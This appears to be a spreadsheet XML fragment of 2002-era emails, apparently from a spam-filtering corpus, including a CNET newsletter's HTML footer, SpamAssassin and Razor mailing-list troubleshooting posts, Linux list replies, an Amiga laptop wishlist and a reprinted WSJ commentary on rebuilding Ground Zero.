 									&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr1Rb13R2hNv0T0QkY6b7uR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/7654493_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrd3QQ97VXtuo4I9yc99NcsR" &gt;&lt;B&gt;Apple iPod&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; 5 Gig capacity&lt;BR&gt;
 								&amp;#149; 3x optical/2.5 digital zoom&lt;BR&gt;
 								&amp;#149; 6.5 oz&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzTGPN3Ps0Q93KjZ6eJcnZR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/6232194_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpziJtPk9uAu7hgvo2AKenR" &gt;&lt;B&gt;Sonicblue Rio One (32 MB)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Affordable MP3 player!&lt;BR&gt;
 								&amp;#149; 32MB, USB, Mac/PC comp.&lt;BR&gt;
 								&amp;#149; Upgradeable w/flash memory&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$100&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 	&lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoL8tQU5bZ34JYndFK-AWlrR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/7103844_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBWAWlz7U91okYP2r70U6iR" &gt;&lt;B&gt;Imation RipGo&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Palm-sized CD-R Drive&lt;BR&gt;
 								&amp;#149; Plays CD, WMA, MP3, D-Audio&lt;BR&gt;
 								&amp;#149; 6 hours WMA, 3 hours MP3&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$199&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;		 
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;
 &lt;/p&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#CCCCCC"&gt;&lt;img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bgcolor="#666666"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width="599" bgcolor="#EEEEEE"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#EEEEEE"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width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;&lt;img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HREF='http://clickthru.online.com/Click?q=8c-Ldpar0JwxMtAtkzzzF8JY_nhlEHPLLRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZJdj3zMFuGkeHaXeD3gBcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmP_jF2T_PUCch20LgRR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#CCCCCC" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr height="18"&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#666666"&gt;&lt;img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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=cc-h4hQ-aOb9aNXRIMN7luymgPXosRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Reject, Blackhole, or Fake No-User
</t>
  </si>
  <si>
    <t xml:space="preserve">Op 12-09-2002 00:35 schreef Ellen Clary (ellen@dgi.com):
 &gt;&gt; Then there is a third possibility. Instead of returning a 550 code
 &gt;&gt; indicating you're on to the spammer, fake a 5.1.1 response which is
 &gt;&gt; saying "mailbox does not exist." This would be in the hopes that some
 &gt;&gt; spammers out there actually remove names reported as non-existent from
 &gt;&gt; their lists. I know, a slim hope, but even if only a few do, it can
 &gt;&gt; lower the incidence.
 &gt; 
 &gt; They don't, I can guarantee that.  Quite a few spamtraps nowadays
 &gt; operate by 5nn'ing for 6 months in the hope of getting legit mailers
 &gt; to remove bouncing addrs from lists;  then after 6 months, they just
 &gt; spamtrap all incoming mail to those addrs.  (unfortunately a lot of
 &gt; legit mailers don't bother cleaning their lists either.)
 Most spammers don't check reply codes at all, they just send out as many
 mails as their system will hold without checking for any confirmation.
 A trick to lower spam reception was dicussed on the postfix mailing list
 some time ago: answer all incoming mail with a 4xx temporary error code when
 it is offered the first time, and accept it the second time. Apparently most
 mass-emailers don't even try to deliver a second time.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</si>
  <si>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Re: [Razor-users] Smrazor, Milter, and Max connections
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Vipul Ved Prakash" &lt;mail@vipul.net&gt;
 To: "Sven" &lt;sven@dmv.com&gt;
 Cc: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Wednesday, July 31, 2002 10:31 PM
 Subject: Re: [Razor-users] Smrazor, Milter, and Max connections
 &gt; On Wed, Jul 31, 2002 at 09:44:08PM -0400, Sven wrote:
 &gt; &gt; With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I
 have
 &gt; &gt; managed to get smrazor working (milter) -- sort of ... With light server
 &gt; &gt; loads, it seems to do fine; however during peak traffic times (or peak
 &gt; &gt; catalogue server usage???) , the smrazor milter stops and sometime dumps
 &gt; &gt; core as well.  Does anyone know of a limit in terms of number of
 &gt; &gt; messages/minute that can be theoretically processed? I have noticed
 timeouts
 &gt; &gt; occuring (I set the milter timeout per message to 15 seconds) often in
 huge
 &gt; &gt; lumps and the occasional "Could not get valid info from Discovery
 Servers")
 &gt; &gt; ?????
 &gt;
 &gt; 15 seconds is more than enough timeout... There's no request/minute limit,
 &gt; and we are not close to hardware limits on any of the servers.
 &gt;
 &gt; Could you send me relevant sections from the log file as well as
 &gt; your config?
 &gt;
 &gt;&gt;From the maillog:
 Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.error]
 g712pocb021081: Milter (smrazor): timeout before data read
 Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.info]
 g712pocb021081: Milter (smrazor): to error state
 Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.error]
 g712pocb021091: Milter (smrazor): timeout before data read
 Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.info]
 g712pocb021091: Milter (smrazor): to error state
 &gt;&gt;From razor-agents.log
 Jul 31 17:35:43.637025 check[21171]: [ 1] razor-check error: nextserver:
 discover0: bootstrap_discovery:
 Jul 31 17:35:43.987175 check[21168]: [ 1] razor-check error: nextserver:
 discover0: bootstrap_discovery:
 Jul 31 18:36:34.652485 check[8241]: [ 1] razor-check error: nextserver:
 Could not get valid info from Discovery Servers
 Jul 31 22:01:09.162201 check[9973]: [ 1] razor-check error: nextserver:
 Could not get valid info from Discovery Servers
 &gt;&gt;From smrazor.err
 [07/31/2002 22:52:22] (1144) Error reading from razor-check (156a78)
 (21092): timeout
 [07/31/2002 22:52:42] (1144) Error reading from razor-check (16b948)
 (21221): timeout
 [07/31/2002 22:52:42] (1144) Error reading from razor-check (165348)
 (21227): timeout
 [07/31/2002 22:57:21] (1144) Error reading from razor-check (16d118)
 (22911): timeout
 razor-agent.conf
 #
 # Razor2 config file
 #
 # Autogenerated by Razor-Agents v2.14
 # Wed Jul 31 11:38:43 2002
 # Created with all default values
 #
 # see razor-agent.conf(5) man page
 #
 debuglevel             = 3
 identity               = identity
 ignorelist             = 0
 listfile_catalogue     = servers.catalogue.lst
 listfile_discovery     = servers.discovery.lst
 listfile_nomination    = servers.nomination.lst
 logfile                = /var/log/razor-agent.log
 min_cf                 = ac
 razorhome              = /etc/razor
 razorzone              = razor2.cloudmark.com
 rediscovery_wait       = 172800
 report_headers         = 1
 turn_off_discovery     = 0
 use_engines            = 1,2,3,4
 whitelist              = razor-whitelist
 Realizing that the above, after looking at it, is pretty much no help,
 changed debug to 9 and output the results to a text file. It is attached but
 the crux of the messages resemble:
 Jul 31 23:11:14.633544 check[5689]: [ 7] Can't read file
 servers.discovery.lst, looking relatve to
 Jul 31 23:11:14.634218 check[5689]: [ 5] Can't read file
 /servers.discovery.lst: No such file or directory
  or
 Jul 31 23:07:19.115412 check[26156]: [ 6] no discovery listfile:
 servers.discovery.lst
 Jul 31 23:07:19.115878 check[26156]: [ 5] Finding Discovery Servers via DNS
 in the razor2.cloudmark.com zone
 Jul 31 23:07:19.174862 check[26155]: [ 8] Connection established
 Jul 31 23:07:19.175667 check[26155]: [ 4] 216.52.13.90 &gt;&gt; 29 server
 greeting: sn=N&amp;srl=30&amp;ep4=7542-10&amp;a=l
 Jul 31 23:07:19.176887 check[26155]: [ 4] 216.52.13.90 &lt;&lt; 12
 Jul 31 23:07:19.177344 check[26155]: [ 6] a=g&amp;pm=csl
 Jul 31 23:07:19.214020 check[26124]: [ 6] Found 1 Discovery Servers via DNS
 in the razor2.cloudmark.com zone
 Jul 31 23:07:19.214729 check[26124]: [ 8] Checking with Razor Discovery
 Server 216.52.13.90
 Jul 31 23:07:19.215383 check[26124]: [ 6] No proper port specified, using
 2703
 Jul 31 23:07:19.215833 check[26124]: [ 5] Connecting to 216.52.13.90 ...
 It would appear that even though there is a specified home directory,
 razor-check cannot read the .lst files and must apparently run discovery at
 each lookup?????
 This, btw, is occuring on two separate servers ...
 Sven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</si>
  <si>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On Friday, July 26, 2002, at 05:18 AM, Owen Byrne wrote:
 &gt; employees, and that an awful lot of
 &gt; corporations have shown that they can't keep track of billions 
 &gt; upon billions of dollars.
 I think we need to get away from rhetoric that implies that the 
 billions of dollars in hard cash, revenues, and capitalization was 
 "lost" somehow.
 The ruling class, whether you define them as government or business 
 (what's the difference?) knows full well where that money is.  It's 
 lining their pockets, buying their hobby ranches, and financing 
 their private jets.
 Neither has any interest in the welfare of the working class.
 Of course, none of this is new bits.
 -Ian.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; 'Scuse me for posting in Greek.  :)
 Better you than me, but I'm sure we all share in your joy.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):
 &gt; Anyway, I should have initiated a new thread for my different request
 &gt; about S.u.S.E. CDs.
 You'll probably want to buy a retail boxed set, e.g., via mail order.
 The only editions of SuSE for i386 that are lawful to duplicate and
 redistribute are as follows:
 SuSE Evaluation:  This is a single-CD ISO9660 image, currently at v. 7.0. 
 If you don't mind having only one disk's worth of SuSE, and being
 several revisions behind the boxed-set editions, this is quite good and 
 recommended.
 SuSE Live Eval:  Another CD image, currently at v. 8.0, but this one
 doesn't install to hard drives at all:  It's a demo disk.
 SuSE FTP Edition (for lack of an official name):  Not a CD image, but
 the contents of ftp://ftp.suse.com/pub/suse/i386/current/ .  You would
 have to mirror the ftp directory tree, and then figure out how to
 install (e.g., over NFS).  Currently at v. 8.0.
 There are three (non-redistributable) boxed-set editions, at different
 price points.
 I'm assuming in the above that you're talking about an i386-architecture
 computer.  Slightly different answers apply for Alpha, IA64, SPARC, PPC,
 SPARC64, PPC64, or S390.
 -- 
 Cheers,                   "Teach a man to make fire, and he will be warm 
 Rick Moen                 for a day.  Set a man on fire, and he will be warm
 rick@linuxmafia.com       for the rest of his life."   -- John A. Hrastar
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: UAE/Ami*/Linux Laptop:  Important details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, for one, it would free up the similar laptop I already got to
 just run Amithlon (or if that wasn't so fun, bsd) to run just OpenBSD!
 This is a near-term thing I could look forward to!
 However, an 'official' laptop seems unexciting to me with only
 the items mentioned.  Most important are the particulars distinguishing
 the listed spec from a Dell 2650, preferably:
 1- GeForce4 440 Go or newer, pleasingly modern GPU; the
    GeForce2Go (with 16MB video RAM; too little) I have is
    not so much too slow as inefficient; with factory settings it would
    actually crash from running too hot and too fast.
    (Accelerating the Ami* and possibly OpenUAE graphics
    is a necessity to meet for good speed in those environments,
    but an energy-efficient GPU is a good sideeffect and
     portability (read: battery lifetime) enabler.)
 1.5- Great control over CPU state; by use of 'internet keys'
     wired to BIOS/bhipset routines directly or preferably a scroll
     wheel.  Also, hibernate that works, please.
 1.7- Bootable to USB 2.0 drives (e.g. larger external ones)
     in BIOS, please.
 2- P4 Dells overheat.  They have a big heatsink and a little fan
    to pull air through it, and if you don't elevate thelaptop off
    the desk or table or bed it's on, the fan will -stay- on.  Not good
   for MTBS (mean time between service; unless you've got an
   angle on making money on service from Amigans.....)
      One excellent solution is to include a heatpipe which runs
   behind the AMLCD, thus using the backside of the display
   half as a radiator.; though it interferes with the case notion
   below.  (yes, Aavid or such makes some as a standard part.)
       I prefer to include the heatpipe but employ the radiative
   mass in elevating the laptop (i.e. in the form of a catch-handle
   and second logo device behind the laptop, which generally
   provides stow and attachment for elevation legs (move them
   out farther to get to the next-higher ekevation, until the sides
   of the laptop are met.)  This also happens to provide a little
   protection for USB 2  and 1394 cables that I tend to keep
   plugged in all the time (a bit longer port life? Please.) 
 3- A case color other than brown or black, and preferably (if the
     display module NRE is entirely permissive) the capability to
     -run with the backlight off.-  Again, to save battery power, but
     also as a feature; maybe you remember the iBooks modified
    in this manner.  The user has the privilege to pull out the
    backlight diffuser and fiberoptic lightpipe/CF assembly, with
    its backreflector, and the whole warrantee.  This provides
    for excellent outdoor use, often with the diffuser reinserted
    to keep depth-of-field distractions minimised.
      What would I like?  A1200 putty color, any translucency,
    in or over a rosewood-colored (in KDE color browser, I see
    chocolate, firebrick and a couple of 'indian red' that are great
    candidates) base.  
       I would also like to be able to at least turn off the backlight
     without closing the lid, and to be -able- to fit an -external-
     light source such as a UV-filtered solar collector (and glare
     hood) to feed
     into the backlight.  Not only does this make an excellent 
     color environment but lets one work outdoors tolerably.
       The logo should be a coloration of a
    minimal surface, as the MAA is trying to get me to renew
    with:  demos at http://astronomy.swin.edu.au/pbourke/geometry/
    at first blush.  We'll see what comes out of the contest and
    maybe you'll like the mapping MathCAD does of the
    logo to a minimal surface or manifold that reflects the
    openness of AmigaOS, Ami* and Amiga community.
    MAA.org has more references, I'm sure.
 4- Obviously Elfin details., e,g, the backlight inlet.
 Other details:
 USB2.x preferred; FireWire would be needed if that's unavailable.
 Options like 802.11b or attabhable WiFi hub for ethernet port
 should round out the offering.  An option for just-released 
 .13 micron P4 (with mobile power features) could make more
 reviewers greenlight the series; much better power consumption,
 and almost certainly a higher a top clock come with that.
 CompactFlash, SmartMedia and MMC flash memory card
 interfaces would be very pleasant.  I've mentioned booting to
 USB, and booting from CF would be a pleasant extigency also.
 To that end, a backup solution with compression using
 USB 2 storage or the multimode drive is always a nice 
 bundle item; that or a chance to back out a patch under 3 OS.....
 Blue skies (and clear water and fresh air): 
 Waterproof to 30 feet, 3 Ethernet ports plus onboard WiFi.
 Svelte; 3-line frontpanel LCD and bright red pager LED,
 builtin G4 cellphone functions, choice of side and 
 frontpanel trim: Ivory-like stuff inscribed with M68k memory map
 and various OS 3.9 structures or textured fur that
 says 'This is Amiga Speaking' when stroked 'round. 
 Decent keyboard, as in Toshiba or IBM laptops; perhaps 
 an ergonomic fingerworks.com device (they work as 
 keyboard and mouse) as the keyboard/trackpad.
 2 Directional planar mics atop AMLCD; soundcard with multiple 
 18 bit A-D and noise reduction DSP that work in our
 (second-through-fourth, at least) favorite OS.
 Actual 7" bellows pulls out at nominal ventilation 
 fan location for real void-comp (the test in Blade
 Runner) style cooling and extended bass; active cooling
 and airfiltering is available to adjust humidity at user
 seat and provide mineral water.
 HyperTransport ports.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt.conf suggestion
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; how about applying this to the default apt.conf shipped with the
 &gt; freshrpms.net apt package?  I found it a bit weird when the behaviour
 &gt; changed between the old 0.3.x and the new 0.5.x versions so that when
 &gt; doing a "apt-get upgrade", it wouldn't tell me *which* packages were to
 &gt; be upgraded, just that it was about to upgrade something...
 Indeed, I found that strange too, then I noticed the "-u" switch and used
 that... but your solution is much better :-) The next apt build will
 incorporate this change (not worth a rebuild for this, and as some
 relatively important cnc7 bugs are currently being fixed, I'd say cnc8
 isn't far off!).
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.02 0.06 0.10
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin spamassassin.raw,1.76,1.77
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv4429
 Modified Files:
 	spamassassin.raw 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: spamassassin.raw
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v
 retrieving revision 1.76
 retrieving revision 1.77
 diff -b -w -u -d -r1.76 -r1.77
 --- spamassassin.raw	26 Sep 2002 17:14:59 -0000	1.76
 +++ spamassassin.raw	2 Oct 2002 13:20:32 -0000	1.77
 @@ -218,6 +218,9 @@
    if ($@) { warn $@; }
    if ($doing_whitelist_operation) {
 +    # read the config!
 +    $spamtest-&gt;init (1);
 +
      if ($opt{'add-to-whitelist'}) {
        $spamtest-&gt;add_all_addresses_to_whitelist ($mail);
      } elsif ($opt{'remove-from-whitelist'}) {
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Google? Not in China
</t>
  </si>
  <si>
    <t xml:space="preserve">In a slightly old news story, it turns out the Chinese government has banned
 all access to the Google and AltaVista search engines.
 http://www.nytimes.com/2002/09/04/international/asia/04BEIJ.html
 http://www.bayarea.com/mld/bayarea/business/3996218.htm
 http://news.bbc.co.uk/1/hi/technology/2233229.stm
 http://news.bbc.co.uk/1/hi/technology/2238236.stm
 The reason appears to be the Google cache feature. I can only imagine the
 Internet Archive will soon follow, if it isn't already blocked.
 Seems that governments do have some power over the Web, after all.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rebuild at Ground Zero
</t>
  </si>
  <si>
    <t xml:space="preserve">http://online.wsj.com/article_print/0,,SB10327475102363433,00.html
 The Wall Street Journal
 September 23, 2002
 COMMENTARY
 Rebuild at Ground Zero
 By LARRY SILVERSTEIN
 Earlier this month, we New Yorkers observed the solemn anniversary of the
 horrific events that befell our city on Sept. 11, 2001. All of those who
 perished must never be forgotten. The footprints of the fallen Twin Towers
 and a portion of the 16-acre site must be dedicated to a memorial and civic
 amenities that recall the sacrifices that were made there and the anguish
 that those senseless acts of terror created for the victims' families and,
 indeed, for all of us.
 But for the good of the city and the region, the 10-million-plus square
 feet of commercial and retail space that was destroyed with the Twin Towers
 must be replaced on the site.
 About 50,000 people worked in the World Trade Center. Those jobs are lost,
 along with those of another 50,000 people who worked in the vicinity.
 Together, those jobs in lower Manhattan, for which the Trade Center was the
 economic stimulus, produced annual gross wages of about $47 billion, or 15%
 of the annual gross wages earned in the entire state. Some of the firms
 have relocated elsewhere in the city and region, but many have not. New
 York City is facing a budget deficit. Without additional jobs, the deficit
 may become permanent. This is one reason for the importance of rebuilding.
 If we do not replace the lost space, lower Manhattan never will regain the
 vibrancy it had as the world's financial center. Love them or hate them,
 and there were lots of New Yorkers on both sides of the issue, the Towers
 made a powerful statement to the world that said, "This is New York, a
 symbol of our free economy and of our way of life." That is why they were
 destroyed. This is a second reason why the towers must be replaced, and
 with buildings that make a potent architectural statement.
 In recent weeks, redevelopment proposals have been circulated from many
 sources. Most of these focus not on the Trade Center site, however, but on
 all of lower Manhattan. Further, many believe that the 10 million square
 feet either could be located elsewhere, scattered in several sites, or
 simply never rebuilt.
 These proposals miss the point. What was destroyed, and what must be
 recovered, was the Trade Center, not all of lower Manhattan. Except over
 the towers' footprints, where there must be no commercial development, the
 office and retail space lost has to be rebuilt on or close to where it was.
 Access to mass transit makes the site ideal for office space of this size.
 That was a major reason why the Twin Towers were leased to 97% occupancy
 before 9/11. None of the other sites proposed for office development has
 remotely equal transportation access. With the reconstruction of the subway
 and PATH stations, plus an additional $4.5 billion in transit improvements
 planned, such as the new Fulton Transit Center and the direct
 "Train-to-the-Plane" Long Island Rail Road connection, the site becomes
 even more the logical locus of office development.
 And New York will need the space. Before 9/11, the Group of 35, a task
 force of civic leaders led by Sen. Charles Schumer and former Treasury
 Secretary Robert Rubin, concluded that the city would need an additional 60
 million square feet of new office space by 2020 to accommodate the
 anticipated addition of 300,000 new jobs. The loss of the Twin Towers only
 heightens the need.
 As for those who say that 10 million square feet of office space downtown
 cannot be absorbed by the real estate market, I would simply point out that
 history shows them wrong. New York now has about 400 million square feet of
 office space. All new construction underway already is substantially leased
 up. New York had 48 million square feet of vacant office space at the
 beginning of the recession in 1990. By 1998, this space had been absorbed,
 at an annual rate of about 6 million square feet.
 We are seeking to rebuild 10 million square feet on the Trade Center site
 over a period of about 10 years, with the first buildings not coming on
 line until 2008 and the project reaching completion in 2012. This is an
 annual absorption rate of about a million feet, much lower than the 1990s'
 rate.
 Those who argue that New York cannot reabsorb office space that it
 previously had are saying that the city has had its day and is entering an
 extended period of stagnation and decline. I will not accept this view, nor
 will most New Yorkers.
 Mayor Michael Bloomberg said in a recent interview with the New York Times
 that the city "has to do two things: memorialize, but also build for the
 future." I believe that the Twin Towers site can gracefully accommodate --
 and that downtown requires -- office and retail space of architectural
 significance, a dignified memorial that both witnesses and recalls what
 happened, and cultural amenities that would benefit workers as well as
 residents of the area.
 The challenge to accomplish this is enormous. But our city is up to the task.
 Mr. Silverstein is president of Silverstein Properties, a real estate firm
 whose affiliates hold 99-year leases on the World Trade Center site.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</si>
  <si>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On Thursday 01 Aug 2002 1:29 pm, Ralf Ertzinger wrote:
 &gt; Hi.
 &gt;
 &gt; John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt; wrote:
 &gt; &gt; So, I *do* have OpenGL, thanks all.
 &gt;
 &gt; And it is using your hardware.
 &gt;
 &gt; &gt; Problem is that I can't find an rpm of plib which will install (or
 &gt; &gt; recognise that I have open GL). I guess I'll have to try and do that
 &gt; &gt; from source, unless anyone has any ideas?
 &gt;
 &gt; plib as in plib.sf.net? They do not provide RPMs, as far as I have seen
 &gt; (and I did not look inside the tarballs). Maybe it will be best to
 &gt; build your RPMS yourself (and maybe Matthias can share some insight
 &gt; in building RPMS with NVIDIAs drivers installed, it seems to be a
 &gt; little tricky to do that and get RPMS which install on systems
 &gt; without these drivers).
 Please! It does seem that with 7.3 something rather extraordinary has 
 happened! And while there are rpms for plib (as in plib.sf.net), TuxRacer, 
 FlightGear and so on (for SuSE, Mandy and Connectiva, IIRC) dotted around, 
 there are none for 7.3. 
 Cheers
 John
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
